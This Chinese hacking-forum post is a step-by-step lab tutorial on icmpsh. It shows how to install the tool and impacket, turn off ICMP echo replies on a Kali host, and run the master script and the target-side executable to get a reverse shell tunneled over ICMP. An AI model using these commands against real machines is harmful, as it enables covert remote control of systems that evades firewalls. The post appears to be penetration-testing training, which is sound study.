十九,隧道_icmp隧道_icmpsh的使用-女黑客 - Powered by Discuz! Archiver

nvhack 发表于 2023-8-4 10:58:14

十九,隧道_icmp隧道_icmpsh的使用

https://github.com/bdamele/icmpsh

kali:192.168.100.85win2012:192.168.100.10安装pip 使用get-pip.py
安装icmpshsudo git clone https://github.com/inquisb/icmpsh.git
安装impacketsudo git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
sudo python setup.py install

关闭本机的icmp应答,防止内核对自己的ping包响应sysctl -w net.ipv4.icmp_echo_ignore_all=1

sudo python2 icmpsh_m.py 192.168.100.85 192.168.100.10
icmpsh_m.py[本机IP] [目标IP]


目标机器执行icmpsh.exe -t 192.168.100.85



成功反弹shell






页: [1]
查看完整版本: 十九,隧道_icmp隧道_icmpsh的使用